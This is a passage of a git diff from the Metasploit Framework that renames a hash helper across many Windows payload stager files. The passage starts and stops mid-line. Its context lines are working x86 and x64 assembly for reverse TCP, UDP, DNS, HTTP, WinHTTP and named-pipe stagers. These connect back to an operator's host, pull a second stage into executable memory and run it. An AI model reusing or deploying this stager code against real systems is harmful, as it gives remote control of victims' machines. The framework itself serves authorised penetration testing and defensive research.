asm_reverse_http(opts={}) ; LPVOID lpBuffer (username from previous call) push 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME) push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -337,7 +337,7 @@ def asm_reverse_http(opts={}) ; LPVOID lpBuffer (password from previous call) push 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD) push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -352,7 +352,7 @@ def asm_reverse_http(opts={}) push edi ; server URI push ebx ; method push esi ; hConnection - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpOpenRequestA')} + push #{block_api_hash('wininet.dll', 'HttpOpenRequestA')} call ebp xchg esi, eax ; save hHttpRequest in esi ^ @@ -379,7 +379,7 @@ def asm_reverse_http(opts={}) push eax ; &dwFlags push 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetSetOptionA')} + push #{block_api_hash('wininet.dll', 'InternetSetOptionA')} call ebp ^ end @@ -406,14 +406,14 @@ def asm_reverse_http(opts={}) asm << %Q^ push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'HttpSendRequestA')} + push #{block_api_hash('wininet.dll', 'HttpSendRequestA')} call ebp test eax,eax jnz allocate_memory set_wait: push #{retry_wait} ; dwMilliseconds - push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + push #{block_api_hash('kernel32.dll', 'Sleep')} call ebp ; Sleep( dwMilliseconds ); ^ @@ -442,7 +442,7 @@ def asm_reverse_http(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -459,7 +459,7 @@ def asm_reverse_http(opts={}) push 4 ; bytes to read push eax ; &stage size push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead) pop ebx ; bytesRead (unused, pop for cleaning) pop ebx ; stage size @@ -470,7 +470,7 @@ def asm_reverse_http(opts={}) push 0x1000 ; MEM_COMMIT push ebx ; Stage allocation push eax ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: xchg eax, ebx ; place the allocated base address in ebx @@ -482,7 +482,7 @@ def asm_reverse_http(opts={}) push eax ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) jz failure @@ -495,7 +495,7 @@ def asm_reverse_http(opts={}) push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -509,7 +509,7 @@ def asm_reverse_http(opts={}) push 8192 ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('wininet.dll', 'InternetReadFile')} + push #{block_api_hash('wininet.dll', 'InternetReadFile')} call ebp test eax,eax ; download failed? (optional?) diff --git a/lib/msf/core/payload/windows/reverse_named_pipe.rb b/lib/msf/core/payload/windows/reverse_named_pipe.rb index 9648e71db430f..a2f5244749734 100644 --- a/lib/msf/core/payload/windows/reverse_named_pipe.rb +++ b/lib/msf/core/payload/windows/reverse_named_pipe.rb @@ -126,7 +126,7 @@ def asm_reverse_named_pipe(opts={}) db "#{full_pipe_name}", 0x00 get_pipe_name: ; lpFileName (via call) - push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateFileA')} + push #{block_api_hash('kernel32.dll', 'CreateFileA')} call ebp ; CreateFileA(...) ; If eax is -1, then we had a failure. @@ -147,7 +147,7 @@ def asm_reverse_named_pipe(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -172,7 +172,7 @@ def asm_reverse_named_pipe(opts={}) push 4 ; nNumberOfBytesToRead = sizeof( DWORD ); push esi ; lpBuffer push edi ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(...) to read the size ^ @@ -195,7 +195,7 @@ def asm_reverse_named_pipe(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage @@ -217,7 +217,7 @@ def asm_reverse_named_pipe(opts={}) push ecx ; nNumberOfBytesToRead push ebx ; lpBuffer push edi ; hFile - push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')} + push #{block_api_hash('kernel32.dll', 'ReadFile')} call ebp ; ReadFile(...) to read the data ^ @@ -237,7 +237,7 @@ def asm_reverse_named_pipe(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) ; restore the stack (one more pop after 2nd ReadFile call) pop esi @@ -245,7 +245,7 @@ def asm_reverse_named_pipe(opts={}) cleanup_file: ; clear up the named pipe handle push edi ; named pipe handle - push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')} + push #{block_api_hash('kernel32.dll', 'CloseHandle')} call ebp ; CloseHandle(...) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb index 19ad38cfe7653..643dd0a2103eb 100644 --- a/lib/msf/core/payload/windows/reverse_tcp.rb +++ b/lib/msf/core/payload/windows/reverse_tcp.rb @@ -118,7 +118,7 @@ def asm_reverse_tcp(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} mov eax, ebp call eax ; LoadLibraryA( "ws2_32" ) @@ -126,7 +126,7 @@ def asm_reverse_tcp(opts={}) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -145,7 +145,7 @@ def asm_reverse_tcp(opts={}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this ^ @@ -168,7 +168,7 @@ def asm_reverse_tcp(opts={}) push #{sockaddr_size} ; length of the sockaddr_in struct (we only set the first 8 bytes, the rest aren't used) push esi ; pointer to the sockaddr_in struct push edi ; socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')} + push #{block_api_hash('ws2_32.dll', 'bind')} call ebp ; bind( s, &sockaddr_in, 16 ); push #{encoded_host} ; host in little-endian format push #{encoded_port} ; family AF_INET and port number @@ -181,7 +181,7 @@ def asm_reverse_tcp(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -201,7 +201,7 @@ def asm_reverse_tcp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -231,7 +231,7 @@ def asm_block_recv(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ @@ -251,7 +251,7 @@ def asm_block_recv(opts={}) push 0x1000 ; MEM_COMMIT push esi ; push the newly received second stage length. push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... xchg ebx, eax ; ebx = our new memory address for the new stage @@ -262,7 +262,7 @@ def asm_block_recv(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -278,13 +278,13 @@ def asm_block_recv(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_tcp_dns.rb b/lib/msf/core/payload/windows/reverse_tcp_dns.rb index 4b998b3efd271..760cd9def42d8 100644 --- a/lib/msf/core/payload/windows/reverse_tcp_dns.rb +++ b/lib/msf/core/payload/windows/reverse_tcp_dns.rb @@ -79,14 +79,14 @@ def asm_reverse_tcp_dns(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); push eax ; if we succeed, eax will be zero, push zero for the flags param. @@ -97,7 +97,7 @@ def asm_reverse_tcp_dns(opts={}) push eax ; push SOCK_STREAM inc eax ; push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -108,7 +108,7 @@ def asm_reverse_tcp_dns(opts={}) db "#{opts[:host]}", 0x00 got_hostname: - push #{Rex::Text.block_api_hash( "ws2_32.dll", "gethostbyname" )} + push #{block_api_hash( "ws2_32.dll", "gethostbyname" )} call ebp ; gethostbyname( "name" ); set_address: @@ -122,7 +122,7 @@ def asm_reverse_tcp_dns(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -142,7 +142,7 @@ def asm_reverse_tcp_dns(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end diff --git a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb index 1af3eb130f15e..352943a25ce08 100644 --- a/lib/msf/core/payload/windows/reverse_tcp_rc4.rb +++ b/lib/msf/core/payload/windows/reverse_tcp_rc4.rb @@ -70,7 +70,7 @@ def asm_block_recv_rc4(opts={}) push 4 ; length = sizeof( DWORD ); push esi ; the 4 byte buffer on the stack to hold the second stage length push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, &dwLength, 4, 0 ); ^ @@ -93,7 +93,7 @@ def asm_block_recv_rc4(opts={}) ; push esi ; push the newly received second stage length. push ecx ; push the alloc length push 0 ; NULL as we dont care where the allocation is. - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... ; xchg ebx, eax ; ebx = our new memory address for the new stage + S-box @@ -106,7 +106,7 @@ def asm_block_recv_rc4(opts={}) push esi ; length push ebx ; the current address into our second stage's RWX buffer push edi ; the saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')} + push #{block_api_hash('ws2_32.dll', 'recv')} call ebp ; recv( s, buffer, length, 0 ); ^ @@ -122,13 +122,13 @@ def asm_block_recv_rc4(opts={}) push 0x4000 ; dwFreeType (MEM_DECOMMIT) push 0 ; dwSize push eax ; lpAddress - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')} + push #{block_api_hash('kernel32.dll', 'VirtualFree')} call ebp ; VirtualFree(payload, 0, MEM_DECOMMIT) cleanup_socket: ; clear up the socket push edi ; socket handle - push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')} + push #{block_api_hash('ws2_32.dll', 'closesocket')} call ebp ; closesocket(socket) ; restore the stack back to the connection retry count diff --git a/lib/msf/core/payload/windows/reverse_udp.rb b/lib/msf/core/payload/windows/reverse_udp.rb index 05df86677e026..64cdb831d4c1a 100644 --- a/lib/msf/core/payload/windows/reverse_udp.rb +++ b/lib/msf/core/payload/windows/reverse_udp.rb @@ -75,14 +75,14 @@ def asm_reverse_udp(opts={}) push '32' ; Push the bytes 'ws2_32',0,0 onto the stack. push 'ws2_' ; ... push esp ; Push a pointer to the "ws2_32" string on the stack. - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "ws2_32" ) mov eax, 0x0190 ; EAX = sizeof( struct WSAData ) sub esp, eax ; alloc some space for the WSAData structure push esp ; push a pointer to this struct push eax ; push the wVersionRequested parameter - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')} + push #{block_api_hash('ws2_32.dll', 'WSAStartup')} call ebp ; WSAStartup( 0x0190, &WSAData ); set_address: @@ -101,7 +101,7 @@ def asm_reverse_udp(opts={}) inc eax ; push eax ; push SOCK_DGRAM (UDP socket) push eax ; push AF_INET - push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')} + push #{block_api_hash('ws2_32.dll', 'WSASocketA')} call ebp ; WSASocketA( AF_INET, SOCK_DGRAM, 0, 0, 0, 0 ); xchg edi, eax ; save the socket for later, don't care about the value of eax after this @@ -109,7 +109,7 @@ def asm_reverse_udp(opts={}) push 16 ; length of the sockaddr struct push esi ; pointer to the sockaddr struct push edi ; the socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')} + push #{block_api_hash('ws2_32.dll', 'connect')} call ebp ; connect( s, &sockaddr, 16 ); test eax,eax ; non-zero means a failure @@ -129,7 +129,7 @@ def asm_reverse_udp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -160,7 +160,7 @@ def asm_send_newline db #{newline} ; newline get_nl_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send ^ asm diff --git a/lib/msf/core/payload/windows/reverse_win_http.rb b/lib/msf/core/payload/windows/reverse_win_http.rb index c380376add27d..b6e2ed58a84ca 100644 --- a/lib/msf/core/payload/windows/reverse_win_http.rb +++ b/lib/msf/core/payload/windows/reverse_win_http.rb @@ -205,7 +205,7 @@ def asm_reverse_winhttp(opts={}) push 0x00707474 ; Push the string 'winhttp',0 push 0x686E6977 ; ... push esp ; Push a pointer to the "winhttp" string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "winhttp" ) ^ @@ -215,7 +215,7 @@ def asm_reverse_winhttp(opts={}) push 0x00323374 ; Push the string 'crypt32',0 push 0x70797263 ; ... push esp ; Push a pointer to the "crypt32" string - push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} + push #{block_api_hash('kernel32.dll', 'LoadLibraryA')} call ebp ; LoadLibraryA( "wincrypt" ) ^ end @@ -236,7 +236,7 @@ def asm_reverse_winhttp(opts={}) ; ProxyName (via call) push 3 ; AccessType (NAMED_PROXY= 3) push ebx ; UserAgent (NULL) [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpen')} call ebp ^ else @@ -246,7 +246,7 @@ def asm_reverse_winhttp(opts={}) push ebx ; ProxyName (NULL) push ebx ; AccessType (DEFAULT_PROXY= 0) push ebx ; UserAgent (NULL) [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpen')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpen')} call ebp ^ end @@ -280,7 +280,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ push eax ; Session handle returned by WinHttpOpen - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpConnect')} + push #{block_api_hash('winhttp.dll', 'WinHttpConnect')} call ebp WinHttpOpenRequest: @@ -292,7 +292,7 @@ def asm_reverse_winhttp(opts={}) push edi ; ObjectName (URI) push ebx ; Verb (GET method) (NULL) push eax ; Connect handle returned by WinHttpConnect - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} + push #{block_api_hash('winhttp.dll', 'WinHttpOpenRequest')} call ebp xchg esi, eax ; save HttpRequest handler in esi ^ @@ -325,7 +325,7 @@ def asm_reverse_winhttp(opts={}) push 1 ; AuthScheme (WINHTTP_AUTH_SCHEME_BASIC = 1) push 1 ; AuthTargets (WINHTTP_AUTH_TARGET_PROXY = 1) push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetCredentials')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetCredentials')} call ebp ^ elsif opts[:proxy_ie] == true @@ -337,7 +337,7 @@ def asm_reverse_winhttp(opts={}) push edi ; store the current URL in case it's needed mov edi, eax ; put the buffer pointer in edi push edi ; Push a pointer to the buffer - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} + push #{block_api_hash('winhttp.dll', 'WinHttpGetIEProxyConfigForCurrentUser')} call ebp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -374,7 +374,7 @@ def asm_reverse_winhttp(opts={}) push edx ; lpcwszUrl lea eax, [esp+64] ; Find the pointer to the hSession - HACK! push [eax] ; hSession - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} + push #{block_api_hash('winhttp.dll', 'WinHttpGetProxyForUrl')} call ebp test eax, eax ; skip the rest of the proxy stuff if the call failed @@ -403,7 +403,7 @@ def asm_reverse_winhttp(opts={}) push edi ; lpBuffer (pointer to the proxy) push 38 ; dwOption (WINHTTP_OPTION_PROXY) push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} call ebp ie_proxy_setup_finish: @@ -420,7 +420,7 @@ def asm_reverse_winhttp(opts={}) push eax ; &buffer push 31 ; DWORD dwOption (WINHTTP_OPTION_SECURITY_FLAGS) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSetOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpSetOption')} call ebp ^ end @@ -456,7 +456,7 @@ def asm_reverse_winhttp(opts={}) asm << %Q^ push esi ; HttpRequest handle returned by WinHttpOpenRequest [1] - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpSendRequest')} + push #{block_api_hash('winhttp.dll', 'WinHttpSendRequest')} call ebp test eax,eax jnz check_response ; if TRUE call WinHttpReceiveResponse API @@ -476,7 +476,7 @@ def asm_reverse_winhttp(opts={}) else asm << %Q^ failure: - push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')} + push #{block_api_hash('kernel32.dll', 'ExitProcess')} call ebp ^ end @@ -500,7 +500,7 @@ def asm_reverse_winhttp(opts={}) push ebx ; &buffer push 78 ; DWORD dwOption (WINHTTP_OPTION_SERVER_CERT_CONTEXT) push esi ; hHttpRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpQueryOption')} + push #{block_api_hash('winhttp.dll', 'WinHttpQueryOption')} call ebp test eax, eax ; jz failure ; Bail out if we couldn't get the certificate context @@ -517,7 +517,7 @@ def asm_reverse_winhttp(opts={}) push edi ; &buffer (20-byte SHA1 hash) push 3 ; DWORD dwPropId (CERT_SHA1_HASH_PROP_ID) push [ebx] ; *pCert - push #{Rex::Text.block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} + push #{block_api_hash('crypt32.dll', 'CertGetCertificateContextProperty')} call ebp test eax, eax ; jz failure ; Bail out if we couldn't get the certificate context @@ -555,7 +555,7 @@ def asm_reverse_winhttp(opts={}) ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) push esi ; Request handler returned by WinHttpSendRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} + push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} call ebp test eax,eax jz failure @@ -570,7 +570,7 @@ def asm_reverse_winhttp(opts={}) push 4 ; bytes to read push eax ; &stage size push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp ; InternetReadFile(hFile, lpBuffer, dwNumberOfBytesToRead, lpdwNumberOfBytesRead) pop ebx ; bytesRead (unused, pop for cleaning) pop ebx ; stage size @@ -583,7 +583,7 @@ def asm_reverse_winhttp(opts={}) push 0x1000 ; MEM_COMMIT push ebx ; Stage allocation push eax ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -597,7 +597,7 @@ def asm_reverse_winhttp(opts={}) push eax ; read length push ebx ; buffer push esi ; hRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp test eax,eax ; download failed? (optional?) jz failure @@ -610,7 +610,7 @@ def asm_reverse_winhttp(opts={}) ; first to get a valid handle for WinHttpReadData push ebx ; Reserved (NULL) push esi ; Request handler returned by WinHttpSendRequest - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} + push #{block_api_hash('winhttp.dll', 'WinHttpReceiveResponse')} call ebp test eax,eax jz failure @@ -620,7 +620,7 @@ def asm_reverse_winhttp(opts={}) push 0x1000 ; MEM_COMMIT push 0x00400000 ; Stage allocation (4Mb ought to do us) push ebx ; NULL as we dont care where the allocation is - push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + push #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); download_prep: @@ -634,7 +634,7 @@ def asm_reverse_winhttp(opts={}) push 8192 ; NumberOfBytesToRead push ebx ; Buffer push esi ; Request handler returned by WinHttpReceiveResponse - push #{Rex::Text.block_api_hash('winhttp.dll', 'WinHttpReadData')} + push #{block_api_hash('winhttp.dll', 'WinHttpReadData')} call ebp test eax,eax ; if download failed? (optional?) diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb index 60ae0a629c37c..fc44a33581096 100644 --- a/lib/msf/core/payload/windows/send_uuid.rb +++ b/lib/msf/core/payload/windows/send_uuid.rb @@ -28,7 +28,7 @@ def asm_send_uuid(uuid=nil) db #{raw_to_db(uuid_raw)} ; UUID get_uuid_address: push edi ; saved socket - push #{Rex::Text.block_api_hash('ws2_32.dll', 'send')} + push #{block_api_hash('ws2_32.dll', 'send')} call ebp ; call send ^ diff --git a/lib/msf/core/payload/windows/x64/addr_loader.rb b/lib/msf/core/payload/windows/x64/addr_loader.rb index d5e789cbaf871..4e5fb263ccef4 100644 --- a/lib/msf/core/payload/windows/x64/addr_loader.rb +++ b/lib/msf/core/payload/windows/x64/addr_loader.rb @@ -47,7 +47,7 @@ def asm_block_loader pop r8 ; MEM_COMMIT mov rdx, rsi ; the newly received second stage length. xor rcx, rcx ; NULL as we dont care where the allocation is. - mov r10, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')} + mov r10d, #{block_api_hash('kernel32.dll', 'VirtualAlloc')} call rbp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); ; Receive the second stage and execute it... mov rbx, rax ; rbx = our new memory address for the new stage diff --git a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb index f70071f3656ba..1c6c45464cee0 100644 --- a/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb +++ b/lib/msf/core/payload/windows/x64/bind_named_pipe_x64.rb @@ -121,7 +121,7 @@ def asm_send_uuid(uuid=nil) pop r8 ; nNumberOfBytesToWrite sub rsp, 16 ; allocate + alignment mov r9, rsp ; lpNumberOfBytesWritten - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')} + mov r10d, #{block_api_hash('kernel32.dll', 'WriteFile')} call rbp ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten) add rsp, 16 ^ @@ -159,7 +159,7 @@ def asm_bind_named_pipe(opts={}) push 0 ; nDefaultTimeOut push #{chunk_size} ; nInBufferSize push #{chunk_size} ; nOutBufferSize - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')} + mov r10d, #{block_api_hash('kernel32.dll', 'CreateNamedPipeA')} call rbp ; CreateNamedPipeA mov rdi, rax ; save hPipe (using sockrdi convention) @@ -175,11 +175,11 @@ def asm_bind_named_pipe(opts={}) connect_pipe: mov rcx, rdi ; hPipe xor rdx, rdx ; lpOverlapped - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')} + mov r10d, #{block_api_hash('kernel32.dll', 'ConnectNamedPipe')} call rbp ; ConnectNamedPipe ; check for failure - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')} + mov r10d, #{block_api_hash('kernel32.dll', 'GetLastError')} call rbp ; GetLastError cmp rax, 0x217 ; looking for ERROR_PIPE_CONNECTED jz get_stage_size ; success @@ -188,7 +188,7 @@ def asm_bind_named_pipe(opts={}) ; wait before trying again mov rcx, #{retry_wait} - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')} + mov r10d, #{block_api_hash('kernel32.dll', 'Sleep')} call rbp ; Sleep jmp connect_pipe ^ @@ -206,7 +206,7 @@ def asm_bind_named_pipe(opts={}) mov rdx, rsp ; lpMode (PIPE_WAIT) xor r8, r8 ; lpMaxCollectionCount xor r9, r9 ; lpCollectDataTimeout - mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} + mov r10d, #{block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')} call rbp ^ end @@ -221,7 +221,7 @@ def asm_bind_named_pipe(opts={}) mov 